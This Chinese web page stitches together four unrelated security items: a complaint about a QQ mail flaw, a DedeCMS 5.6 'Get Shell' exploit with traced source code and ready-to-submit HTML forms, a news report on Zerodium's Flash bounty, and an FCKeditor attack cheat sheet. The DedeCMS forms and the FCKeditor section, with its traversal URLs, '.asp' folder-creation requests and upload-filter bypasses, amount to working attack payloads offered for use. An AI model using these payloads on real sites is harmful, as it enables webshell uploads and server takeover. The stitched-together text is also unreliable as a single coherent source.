一 : QQ邮箱更新成空谈 又见QQ邮箱新漏洞
在这个动荡的时节,腾讯貌似没有抢到多少风头
不过QQ邮箱新漏洞的发现又将使其QQ产品火一把
查看官方空间其称9.3号对其邮箱进行了更新
不过看完漏洞动画,突然觉得那大的腾讯对待用户似乎还是欠缺了点责任感
别无它意,只是门户网站在IT界争夺市场的时候是不是该对本身产品的质量做些考虑呢?
突然某天打开我的QQ邮件,然后挂了,我想我以后肯定开QQ邮箱的时候长个心眼
发展的同时是否应该多考虑自身产品的可信性.....
二 : DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
DEDECMS 5.6最新Get Shell漏洞
........................
else if($dopost=='save')
{
include(DEDEMEMBER.'/inc/archives_check.php');
//分析处理附加表数据
$inadd_f = $inadd_v = '';
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
............................................ //省略部份代码
$inadd_f .= ','.$vs[0];
$inadd_v .= " ,'".${$vs[0]}."' ";
}
}
}
..........................................
$addtable = trim($cInfos['addtable']);
if(emptyempty($addtable))
{
......................................
}
else
{
$inquery = "INSERT INTO `{$addtable}`(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
if(!$dsql->ExecuteNoneQuery($inquery))
{
..........................................
}
}
..........................................
$artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定义)
function MakeArt($aid,$ismakesign=false)
{
global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
include_once(DEDEINC.'/arc.archives.class.php');
if($ismakesign)
{
$envs['makesign'] = 'yes';
}
$arc = new Archives($aid);
$reurl = $arc->MakeHtml(); //arc.archives.class.php有定义
............................
}
class Archives
{
................
function __construct($aid)
{
............
if($this->ChannelUnit->ChannelInfos['addtable']!='')
{
$query = "SELECT * FROM `{$this->ChannelUnit->ChannelInfos['addtable']}` WHERE `aid` = '$aid'";
$this->addTableRow = $this->dsql->GetOne($query);
}
........................
if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
{
if(is_array($this->addTableRow))
{
...............................
$this->Fields['templet'] = $this->addTableRow['templet'];//注意1
......................................
}
}
.............................
}
function MakeHtml($isremote=0)
{
global $cfg_remote_site,$fileFirst;
if($this->IsError)
{
return '';
}
$this->Fields["displaytype"] = "st";
//预编译$th
$this->LoadTemplet(); //触发1
......................................//省略部份代码
$this->arseDMFields($i,1);
$this->dtp->SaveTo($truefilename); //触发2
......................................
}
继续跟(触发1)$this->LoadTemplet(); //arc.archives.class.php有定义
function LoadTemplet()
{
if($this->TempSource=='')
{
$tempfile = $this->GetTempletFile(); //注意2
if(!file_exists($tempfile) || !is_file($tempfile))
{
echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}
";
echo "模板文件不存在,无法解析文档!";
exit();
}
$this->dtp->LoadTemplate($tempfile); //触发3
$this->TempSource = $this->dtp->SourceString;
}
else
{
$this->dtp->LoadSource($this->TempSource);
}
}
看注意2 的$this->GetTempletFile() //arc.archives.class.php有定义
function GetTempletFile()
{
global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
$cid = $this->ChannelUnit->ChannelInfos['nid'];
if(!emptyempty($this->Fields['templet'])) //注意3
{
$filetag = MfTemplet($this->Fields['templet']);
if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
}
else
{
$filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
}
.......................................
if($cid=='spec')
{
if( !emptyempty($this->Fields['templet']) )
{
$tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
}
else
{
$tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
}
}
...........................................
return $tmpfile;
}
......................
else if($dopost=='save')
{ ....................
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
if(is_array($addonfields))
{
........................
${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
$inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
}
}
...................
if($addtable!='')
{
$upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
if(!$dsql->ExecuteNoneQuery($upQuery))
{..............
}
}
....................
}
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 2. <input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" /> 4. <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" /> 6. <input name="title" type="hidden" id="title" value="1.jpg"
class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/> 8. <button class="button2" type="submit" >更改</button>
</form>
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" /> 3. <input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5. <input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" /> 7. <input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100"
class="intxt"/> 9. <input type="text" name="writer" id="writer" value="123456" maxlength="100"
class="intxt" style="width:219px"/>
<select name='typeid' size='1'> 11. <option value='1'
class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'> 13. <option value='0' selected>请选择分类...</option>
<option value='1'
class='option3' selected>aa</option></select> 15. <textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet"> 17. <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 19. <button class="button2" type="submit">提交</button>
</form>
三 : 漏洞也有“黑市”:干掉最新版Flash 可获10万美元
自Adobe公司上次Flash播放器更新20.0.0.270版已经过去了一周,漏洞商业利用市场已经对绕过这些安全更新产生了新的兴趣。
漏洞交易平台Zerodium近日在推特上宣布,愿意为攻破最新版Flash“堆隔离”特性的人员支付10万美金。这种内存防御机制可以让利用某些类型的安全漏洞更加困难,也意味着黑客最近几年用于注入恶意软件的手段不再管用。
Adobe在2015年早些时候与谷歌Project Zero漏洞研究团队合力开发了这项新功能,与此同时,Project Zero团队也报告称Flash Player三分之一的漏洞已在2015年内修复。
Adobe公司首席科学家菲勒斯·尤利(Peleus Uhley)在去年12月21日发表的一篇博文中称,谷歌Project Zero开发了堆隔离特性的向量,Adobe公司则将该保护手段推广到了ByteArray类。“在上周发布之后,Adobe重写了内存管理器,以扩大堆隔离特性的应用范畴。”
本月月内,Zerodium对能够绕过堆隔离特性和沙箱机制的手段悬赏10万美金。不能够绕过沙盒,但能够击败堆隔离机制的手段则能够拿到6.5万美元。
Chaouki Bekrar在去年建立了Zerodium,他是现在已经接解散的法国漏洞研究公司Vupen Security的创始人,这家公司因制造并向政府销售漏洞而知名。Zerodium的目标和Vupen类似,但与制造自己的漏洞不同,它从第三方研究人员手中获取漏洞。Zerodium对漏洞的要求很苛刻:高风险级,能够可靠利用,基于现代操作系统、软件及设备,未被报告给受影响厂商。Zerodium公司声称能够为订购其安全研究服务的客户提供所需的漏洞信息,外加防护措施和安全建议。这些客户包括“国防、科技、财经领域需要零日漏洞防护的主要企业,以及需要特定和定制安全能力的政府组织。”
Zerodium等漏洞收集平台提供的高回报对于安全研究人员而言很难拒绝,吸引他们不向受影响厂商上报漏洞,而是拖延软件更新的进度,让用户在更长时间内处在不安全状态中。在赏金方面,很少有软件制造商能够达到漏洞收集平台的水平。
今年九月,Zerodium为能够入侵iOS9的浏览器漏洞出价100万美金。11月,该平台发表声明称已有小组拿到了悬赏。
四 : Fckeditor漏洞最新整理
1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
2、爆绝对路径
FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)
/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx2.5可突破
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
3、遍历目录
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录:
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
4、jsp上传
/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
1 | <</code> |
6、 FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK的变化。试试上传1.asp;jpg
6.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。
6.2:继续上传同名文件可变为shell.php;(1).jpg也可以新建1个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7、 突破建立文件夹
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
8、 FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
9、最古老的漏洞,Type文件没有限制!
我接触到的第1个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren这样即可建立1个叫hsren的文件夹,1个新类型,没有任何限制,可以上传任意脚本!
10、browser
FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
本文标题:qq最新漏洞-QQ邮箱更新成空谈 又见QQ邮箱新漏洞61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1